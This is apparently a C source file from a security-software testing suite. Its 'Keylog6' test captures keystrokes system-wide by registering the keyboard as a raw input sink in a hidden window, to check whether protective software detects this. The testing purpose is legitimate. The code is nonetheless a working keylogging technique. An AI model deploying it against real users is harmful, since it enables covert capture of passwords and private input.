/*

 Security Software Testing Suite - Keylog6 (spying test)
 Copyright by www.matousec.com, Different Internet Experience Ltd.
 http://www.matousec.com/


 Credits:

   * This method is used by Anti-Keylogger Tester - GetRawInputData test,
     written by Guillaume Kaddouch - http://www.firewallleaktester.com/aklt.htm.


 Method description:

   * Use RegisterRawInputDevices API to supply the raw input data from the keyboard.

   * Use GetRawInputData API to obtain the input data from the device.

*/

#include <stdio.h>
#include <windows.h>
#include "include/common.h"
#include "include/common-hook.h"
#include "include/common-spy.h"


// a mising constant in older version of mingw
#ifndef WM_INPUT
#define WM_INPUT 0x00FF
#endif

// names of the test's class and window
#define KEYLOG6_CLASS_NAME          "ssts_keylog6_class"
#define KEYLOG6_WINDOW_NAME         "ssts_keylog6_window"


COM_SPY_DATA kd;

/*
 A callback routine from a window to which the raw input data is supplied.

 For more information see 'lpfnWndProc' item of WNDCLASSEX structure.
*/

LRESULT CALLBACK window_proc(HWND hwnd,UINT uMsg,WPARAM wParam,LPARAM lParam)
{
  if (uMsg==WM_INPUT)
  {
    HRAWINPUT hraw_input=(HRAWINPUT)lParam;
    size_t raw_input_size=0;

    if (!GetRawInputData(hraw_input,RID_INPUT,NULL,&raw_input_size,sizeof(RAWINPUTHEADER)))
    {
      LPRAWINPUT raw_input=malloc(raw_input_size);
      if (raw_input)
      {
        memset(raw_input,0,raw_input_size);

        UINT res=GetRawInputData(hraw_input,RID_INPUT,raw_input,&raw_input_size,sizeof(RAWINPUTHEADER));
        if (res!=(UINT)-1)
        {
          if (raw_input->data.keyboard.Message==WM_KEYDOWN)
          {
            BYTE code=raw_input->data.keyboard.VKey;
            UINT chr_val=MapVirtualKey(code,2);

            char chr=LOBYTE(chr_val);
            com_spy_print_and_check_input(chr,&kd);
          }
        } else com_err_set(kd.err_inf,"Unable to obtain raw input data from handle.\n");

        free(raw_input);
      } else com_err_set(kd.err_inf,"Unable to allocate %d bytes of memory.\n",raw_input_size);
    } else com_err_set(kd.err_inf,"Unable to determine the size of raw input structure.\n");
  }

  if (kd.err_inf->occurred)
  {
    com_err_print_clear(kd.err_inf,COM_ERR_STANDARD_PREFIX);

    if (!SetEvent(kd.event))
      com_err_set_print_clear(kd.err_inf,COM_ERR_STANDARD_PREFIX,"Unable to signal event.\n");
  }

  return DefWindowProc(hwnd,uMsg,wParam,lParam);
}



/*
 A thread routine which creates a window, establishes the raw input data to it and then performs the message loop.

 'arg' A pointer to the keylogger.

 If the pattern was found the return value is TRUE, otherwise it is FALSE.
*/

DWORD WINAPI keylogging_routine(PCOM_SPY_DATA kd)
{
  HINSTANCE instance=GetModuleHandle(NULL);

  WNDCLASSEX wc;
  memset(&wc,0,sizeof(wc));
  wc.cbSize=sizeof(WNDCLASSEX);
  wc.hInstance=instance;
  wc.lpfnWndProc=window_proc;
  wc.lpszClassName=KEYLOG6_CLASS_NAME;
  wc.lpszMenuName=NULL;
  wc.style=CS_GLOBALCLASS;

  ATOM class=RegisterClassEx(&wc);
  if (class)
  {
    if (com_verbosity_get()) printf("Window class registered.\n");

    HWND window=CreateWindowEx(0,KEYLOG6_CLASS_NAME,KEYLOG6_WINDOW_NAME,0,0,0,0,0,NULL,NULL,NULL,NULL);
    if (window)
    {
      if (com_verbosity_get()) printf("Window created.\n");
      RAWINPUTDEVICE device;

      device.usUsagePage=0x01;
      device.usUsage=0x06;
      device.dwFlags=RIDEV_INPUTSINK;
      device.hwndTarget=window;

      if (RegisterRawInputDevices(&device,1,sizeof(device)))
      {
        if (com_verbosity_get()) printf("Keyboard has been registered as a raw input device.\n");

        printf("Press any key to exit.\n\nCaptured data:\n");
        if (!SetForegroundWindow(GetDesktopWindow()))
          printf("Unable to set foreground window, please switch to another window manually.\n");

        int done=FALSE;
        while (!done)
        {
          DWORD wres=WaitForSingleObject(kd->event,10);
          switch (wres)
          {
            case WAIT_TIMEOUT:
            {
              MSG msg;
              if (PeekMessage(&msg,NULL,0,0,PM_REMOVE))
              {
                TranslateMessage(&msg);
                DispatchMessage(&msg);
              }

              break;
            }

            case WAIT_OBJECT_0:
              done=TRUE;
              break;

            default:
              if (wres!=WAIT_FAILED) SetLastError(ERROR_SUCCESS);
              com_err_set(kd->err_inf,"Unknown error occurred, WaitForSingleObject returned %ld.\n",wres);

              done=TRUE;
              break;
          }
        }

        memset(&device,0,sizeof(device));
        device.dwFlags=RIDEV_REMOVE;
        RegisterRawInputDevices(&device,1,sizeof(device));
      } else com_err_set(kd->err_inf,"Unable to register keyboard as raw input device.\n");

      DestroyWindow(window);
    } else com_err_set(kd->err_inf,"Unable to create window.\n");

    UnregisterClass(KEYLOG6_CLASS_NAME,instance);
  } else com_err_set(kd->err_inf,"Unable to register a window class.\n");

  return kd->res;
}



int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow)
{
  COM_CONF conf;
  if (!com_console_init_winmain("Keylog6","keylog6",lpCmdLine,&conf,COM_TEST_TYPE_KEYLOG6)) return 1;

  char *used_dlls[]={"user32.dll"};
  if (!com_hook_load_libraries(used_dlls,1)) return 1;

  int res=FALSE;

  COM_ERROR err_inf;
  err_inf.occurred=FALSE;

  if (com_spy_data_init(&kd,&conf,&err_inf))
  {
    DWORD tid=0;
    HANDLE thread=CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)keylogging_routine,&kd,0,&tid);
    if (thread)
    {
      if (com_verbosity_get()) printf("Helper thread started.\n");

      com_spy_wait(&kd,thread);

      CloseHandle(thread);
    } else com_err_set(&err_inf,"Unable to create thread.\n");

    res=kd.res;
    com_spy_data_finit(&kd);
  }

  return com_end(res,&err_inf,&conf);
}
